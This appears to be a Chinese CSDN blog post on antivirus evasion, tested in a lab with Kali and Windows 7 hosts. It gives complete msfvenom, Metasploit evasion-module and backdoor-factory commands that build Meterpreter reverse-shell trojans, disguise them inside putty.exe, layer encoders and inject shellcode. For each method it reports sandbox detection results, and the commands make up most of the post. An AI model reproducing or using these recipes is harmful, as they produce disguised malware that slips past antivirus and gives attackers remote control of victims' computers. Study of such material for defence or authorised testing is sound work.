常见的几种免杀方法

最新推荐文章于 2024-06-04 17:25:35 发布
最新推荐文章于 2024-06-04 17:25:35 发布
阅读量6.5k 收藏 64
点赞数 4
分类专栏: 内网渗透 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49183673/article/details/123294393
版权

攻击机kali:192.168.1.11         靶机Windows7:192.168.1.18

1、自编码免杀

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.11 lport=4444 -e x86/shikata_ga_nai -i 15 -f exe -o shell.exe

开启本地监听并在靶机运行木马,shell反弹成功,木马程序正常使用

微步沙箱检测结果,检出率近一半,效果一般

 ​​​

2、自捆绑免杀

        在生成payload时可以使用捆绑功能,使用msfvenom的 -x 参数可以指定一个自定义的可执行文件作为模板,并将payload嵌入其中,-x 后跟对应的文件路径即可。示例中已在当前文件夹下准备好了模板

msfvenom -x putty.exe -p windows/meterpreter/reverse_tcp lhost=192.168.1.11 lport=4444 -f exe -o shell2.exe

靶机运行木马成功反弹shell,木马可正常使用

 微步检测结果,检出率近一半,效果一般

3、自捆绑+编码免杀

msfvenom -x putty.exe -p windows/meterpreter/reverse_tcp lhost=192.168.1.11 lport=4444 -e x86/shikata_ga_nai -i 15 -f exe -o shell3.exe

 在靶机运行木马反弹shell成功

微步沙箱检测结果,免杀效果一般 

4、多重编码+捆绑免杀

        msfvenom的encoder编码器可以对payload进行一定程度的免杀,同时还可以使用msfvenom多重编码功能,通过管道,让msfvenom用不同的编码器反复编码进行混淆。

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 lhost=192.168.1.11 lport=4444 -f raw | msfvenom -e x86/alpha_upper -a x86 --platform windows -i 5 -f raw | msfvenom -e cmd/powershell_base64 -a x86 --platform windows -x putty.exe -f exe -o shell4.exe

靶机运行木马反弹shell成功,免杀效果一般(免杀方式可多种方式混合使用)

 5、evasion免杀

       2019年1月,metasploit升级为5.0,引入了一个新模块叫evasion模块,官方称这个模块可以创建反杀毒软件的木马

模块:windows/windows_defender_exe、windows/windows_defender_js_hta

msf6 exploit(multi/handler) > use windows/windows_defender_exe
msf6 evasion(windows/windows_defender_exe) > set filename shell5.exe
msf6 evasion(windows/windows_defender_exe) > set lhost 192.168.1.11
msf6 evasion(windows/windows_defender_exe) > set lport 4444
msf6 evasion(windows/windows_defender_exe) > run

 靶机运行木马反弹shell成功,

6、backdoor factory

        backdoor-factory,又称后门工厂(BFD),BFD也是一款老牌的免杀神器,其作者曾经在2015年的blackhat大会上介绍过该工具,但是作者已经于2017年停止更新,免杀效果至今还算是不错。

检查宿主是否支持patch

python backdoor.py -f 程序路径 -S

-f:指定测试程序

-S:检查程序是否支持

 查看宿主程序代码缝隙

python backdoor.py -f 程序路径 -c

-c:查看程序代码缝隙

 获取该文件的可用payload

python backdoor.py -f 程序路径 -s show

-s:选择使用payload

 指定payload、回连地址和端口、输出程序名、指定使用的代码缝隙

python backdoor.py -f 程序路径 -s 指定payload -J -H 回连地址 -P 回连端口 -o 输出程序名

-J:使用多代码缝隙注入

 微步沙箱检测,免杀效果较好

 生成shellcode

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.11 lport=4444 -e x86/shikata_ga_nai -i 10 -f raw -o shellcode.c

注入shellcode

python backdoor.py  -f 程序路径 -s 指定payload -U 指定shellcode -H 回连ip -P 回连端口 -o 输出程序名

 

嘎嘎不是鸭
关注
  • 4
    点赞
  • 64
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
易语言免杀
04-21
易语言免杀技术主要包括以下几个方面: 1. **代码混淆**:通过改变原始代码结构,使得反病毒软件难以理解和识别程序的行为。这可能包括变量重命名、指令重排序、代码嵌套等手法。 2. **壳技术**:为程序添加一层...
小七专用免杀webshell
04-25
免杀技术主要包括但不限于以下几种: 1. **代码混淆**:通过对代码进行混淆处理,使得反病毒软件难以解析和理解Webshell的真正意图。 2. **加密通信**:使用非标准的加密算法或者自定义协议,使得通信内容难以被...
Payload 实现分离免杀
热门推荐
CSDN
08-10 1万+
众所周知,目前的杀毒软件的杀毒原理主要有三种方式,一种基于特征,一种基于行为,一种基于云查杀,其中云查杀的一些特点基本上也可以概括为特征码查杀,不管是哪一种杀毒软件,都会检查PE文件头,尤其是当程序越大时,越容易被查杀。
(完整)免杀全教程【请勿用于非法】.pdf
10-05
(完整)免杀全教程【请勿用于非法】.pdf
默安逐日实验室:免杀研究
最新发布
moresec的博客
06-04 1145
免杀(Bypass AV, Anti-Virus Evasion)是指恶意软件通过各种手段规避杀毒软件和安全检测系统的识别和拦截,从而在目标系统中成功执行。这种技术不仅用于恶意软件的传播,也被信息安全研究人员用来测试和提升安全防护系统的能力。根据有无源码,免杀可以分为以下两种情况:​ 一般直接对二进制可执行文件进行无源码免杀技术难度较高,免杀效果也不好。于是可以通过将编译好的二进制可执行文件转化为一段shellcode,然后编写加载器执行这段shellcode,从而实现无源码免杀向有源码免杀的转化。根据
生命在于学习——免杀
易水哲的博客
10-25 2253
一些免杀的知识,没有实操。
免杀简单介绍
qq_38675102的博客
01-05 2735
免杀简单介绍
【转】免杀基础 -免杀技术及原理
tpriwwq的专栏
05-03 2428
免杀的最基本思路就是去除其特征,这个特征有可能是特征码,也有可能是行为特征,只要在不修改其原有功能的情况下,破坏了病毒与木马所固有的特征,一次免杀就能完成。
【网络安全】简单的免杀方法(非常详细)零基础入门到精通,收藏这一篇就够了
Javachichi的博客
04-14 1853
目录一、免杀的概念二、免杀系统搭建三、免杀工具介绍1、myccl2、C32asm3、OD4、LordPE5、ImportREC6、VC++6.0/visual studio7、数字签名四、关于杀软排名不分前后1、360。2、金山毒霸3、江民4、瑞星5、安天防线6、卡巴斯基7、NOD328、诺顿9、小红伞,木伞10、BD五、杀软的查杀方法1、最基础的查杀2.1、静态启发式2.2、动态启发式3、HIPS4、云安全六、免杀方面的术语1、API2、花指令3、输入表4、区段5、加壳6、反启发7、隐藏输入表什么是免杀
终生免杀远控
02-13
免杀远控技术的实现涉及到以下几个关键知识点: 1. **代码混淆与反逆向工程**:开发者可能采用了各种混淆技术,如字符串加密、函数变形、代码跳跃等,使得逆向工程师难以理解程序的执行逻辑,降低被反病毒软件识别...
免杀远控ghost
07-29
实现免杀远控Ghost的方法多种多样,常见的有以下几种: 1. **代码混淆**:通过改变代码结构,使其难以被反病毒软件解析,降低被识别的可能性。 2. **动态加载**:部分恶意代码不存储在可执行文件中,而是在运行时从...
易语言程序免杀
02-08
在易语言中,"易语言程序免杀"可能涉及到的是如何编写或者修改易语言编译的程序,使其在运行时能够避开反病毒软件的检测,这在合法软件开发中并不常见,但在恶意软件领域可能会被滥用。 免杀技术主要包括以下几个...
免杀】木马免杀制作
网络安全从业者的学习笔记
03-25 1698
免杀就是指能够使病毒木马逃避杀毒软件检测的一种技术。总体来讲,免杀分为静态免杀和动态免杀,静态免杀基于特征值,而动态免杀则是基于行为。这里我们讲Cobalt Strike生成Python木马,免杀绕过火绒。
免杀入门(基础理论)
NZXHJ的博客
09-14 2828
免杀入门的理论相关学习笔记
远控免杀从入门到实践
混子
01-23 6101
前几天突然看到一个大佬写的免杀,就极其好奇,于是乎就看到这个大佬写的免杀并学习,把之前不懂的地方也都整明白了,特别感谢白师傅和卓师傅,这篇文章主要是远控免杀
【网络安全】简单的免杀方法(基本知识)
A1_3_9_7的博客
01-24 1351
什么是免杀免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti -AntiVirus(简写Virus AV),逐字翻译为“ 反-反病毒”,翻译为“反杀毒技术”。 通俗点讲,也就是一个被杀软报毒的PE文 件,经过一系列处理后,使杀软不认为他 是一个病毒或木马。
5.15更新!免杀绕过Defender、360
潇湘信安的博客
07-18 2230
python3写的这个免杀工具,其原理是利用windows提供的API运行指定程序,然后修改其内存数据,将目标进程“掏空”替换成恶意的木马程序以达到隐蔽和免杀的目的。
简单的免杀流程,软件使用方法与一点思路(Cobalt-strike)
weixin_74182283的博客
04-04 1689
字面意思,就是恶意软件或者木马,通过对其进行修改,导致杀毒软件扫描时会默认这款恶意软件是个安全的软件,导致恶意软件成功上传到电脑。通常在渗透测试的过程中,想要进入别人内网,就需要通过一些木马或者一些程序上传至别人内网,从而得到对方内网的权限。正常情况下,linux内可能没啥杀毒软件,但windows系统下的杀毒软件就各种各样,而我们的木马刚传上去就会被杀掉,这时如果懂得如何去对上传的马做一个免杀,使其顺利通过防火墙就显得非常重要了。
TideSec远控免杀学习一(免杀基础+msfvenom隐藏的参数)
fa1lr4in的小博客
02-08 2655
参考链接:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg 参考资料 免杀技术有一套:https://anhkgg.com/aanti-virus/ Meterpreter免杀及对抗分析:https://www.freebuf.com/sectool/157122.html 免杀艺术:https://www.4hou.com/technol...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值